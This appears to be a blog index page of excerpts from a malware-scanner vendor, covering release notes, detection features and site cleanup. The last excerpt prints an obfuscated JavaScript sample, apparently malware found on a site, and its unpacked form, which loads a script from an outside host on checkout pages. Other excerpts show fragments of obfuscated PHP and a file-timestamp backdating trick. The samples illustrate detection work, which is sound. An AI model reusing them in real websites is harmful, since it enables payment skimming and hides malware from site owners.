With the just released beta version 2.0.0b1 of the ISPProtect Malware Scanner we open a new chapter: the support of multiple CPU cores during the scan. On servers with many files to be scanned in one run, the malware scan
Malware Log Analysis: Don’t Let the HTTP Code Fool You
An essential component of the analysis and cleanup of websites infected with malware is viewing and evaluating the log files. However, even here there are things to consider that might seem odd at first glance. Let’s say you find a
ISPProtect version 1.32.3 with FoxAuto web shell detection
Version 1.32.3 of ISPProtect released today now also detects FoxAuto including different variants. FoxAuto is a collection of tools that can be used to download and execute additional malicious scripts via vulnerabilities in a website (WordPress, its plugins, Joomla, etc.).
Malware Scanner 1.31.2 with new features
Today we released version 1.31.2 of ISPProtect Malware Scanner. To update your ISPProtect instance, use ispp_scan –update. New signatures We have added several new signatures and heuristics to the scanner. As a result, even more potentially malicious PHP scripts are
New BETA version 1.30.0 with deep scan feature
Today we have released the beta version 1.30.0 of the ISPProtect Malware Scanner. To update your ISPProtect instance to the beta version, use ispp_scan –update –channel=beta. Be aware that this beta version might still contain bugs. Deep scan Some attackers
New version with extended database scan
With today’s version 1.29.0 of ISPProtect we have made some improvements to the code. The database scan has also been enhanced. In the standard mode using the parameter –db-scan only a small subset of the malware heuristics will be applied
New version scans for files in .well-known directories
As the zscaler team recently reported, there are frequent malware, phishing and virus finds in the .well-known directories on web servers. These directories are used, for example, to confirm domain ownership when a certificate is issued. The widely used “Let’s
New feature: wildcards in scan path
Today the new version 1.26.1 was released. From now on it is possible to use wildcards for the scan. For this there are the new parameters –include and –include-from, with which it is possible to narrow down the paths and
New scanner version (V1.26.0) reduces disk I/O
Today the new version 1.26.0 of the ISPProtect malware scanner was released. In this release there are some new features that make our scanner even better. Speed and disk I/O We’ve re-implemented the file search from scratch. This has enabled
Checking the WordPress settings after cleaning up a hacked or infected website
Few days ago I was hired to clean-up a hacked WordPress page that was affected by the security issue in the WP GDPR Compliance plugin. The attacker created a new admin user and changed/uploaded some files to WordPress. For that
New major release of ISPProtect Malware Scanner
Today we are proud to announce our next major release 1.25.0. What has changed? We introduced a new scan level 1.1 to the scan that searches for PHP code hidden inside of image file names. It is a wide-spread tactic
New version 1.24.13 with new malware heuristics
Today we released the new version 1.24.13 of ISPProtect malware scanner. It includes some new malware signatures and new heuristics for dynamic malware code of which we want to show you a new type of malware that is hard to
Severe remote execution security issue in Drupal announced
On March, 28th drupal announced a severe security issue in Drupal 7 and 8: https://www.drupal.org/sa-core-2018-002. The issue allows unprivileged users to execute code on the server and disclose all data normally not accesible through the web. The security issue is
New version 1.24.7 released
Today we released version 1.24.7 of ISPProtect. The new version contains new heuristics to recognize further malicious code. Following we take a closer look at some malicious code snippet. $a = base64_decode($b); for($i = 0; $i < strlen($a); $i++){ $a[$i]
New release 1.24.6 with redirect checks
Thew new release 1.24.6 of ISPProtect contains several improvements to malware heuristics and false positive lists. E. g., we added some checks for malicious redirects to foreign pages. Marius BurkardMarius Burkard has been working as a software developer for 20
New malware heuristics added
Today we released a new version of ISPProtect that contains improved malware heuristics. It focusses on malware that tries to hide itself or created files by setting file modification types to somewhat in the past. E. g.: <?php touch(‘/path/to/file’, time()
Added option to prevent Ioncube loading
With our new version we added a --no-ioncube switch. This is especially useful if you have installed a system-wide Ioncube loader that conflicts with the one loaded by ISPProtect. Marius BurkardMarius Burkard has been working as a software developer for
Version 1.24.0 with PHP 7.1 support
Today we released version 1.24.0 of our malware scanner ISPProtect. It adds support for PHP 7.1 and improves the starter script. Marius BurkardMarius Burkard has been working as a software developer for 20 years and has several years of experience
New release 1.23.1 with improved database scan options
The new release 1.23.1 of ISPProtect malware scanner adds some useful options to the database scan. --db-no-context hides the context output on hits that were found in databases. --db-exclude=<dbname> excludes database(s) with name <dbname> from the scanning process.You can use
ISPProtect malware scanner 1.23.0 released – unpacking JavaScript
Today we released version 1.23.0 of our malware scanning tool. With this release we added a feature to “unpack” some JavaScripts that were minified. For example: eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c]);return p}(‘1.4=5(){6((2 7(\’8|9|a\’)).b(1.c)){$$(\’d\’)[0].e(2 f(\’g\’,{h:\’i/j\’,k:\’l://m.n.o/p/3/q/r.3\’}))}}’,28,28,’|window|new|js|onload|function|if|RegExp|onepage|checkout|onestep|test|location|head|appendChild|Element|script|type|text|javascript|src|https|boutique|postedecoute|ca|media|shipping|ups’.split(‘|’),0,{})); will be unpacked to window.onload=function(){if((new RegExp(‘onepage|checkout|onestep’)).test(window.location)){$$(‘head’)[0].appendChild(new Element(‘script’,{type:’text/javascript’,src:’https://boutique.postedecoute.ca/media/js/shipping/ups.js’}))}}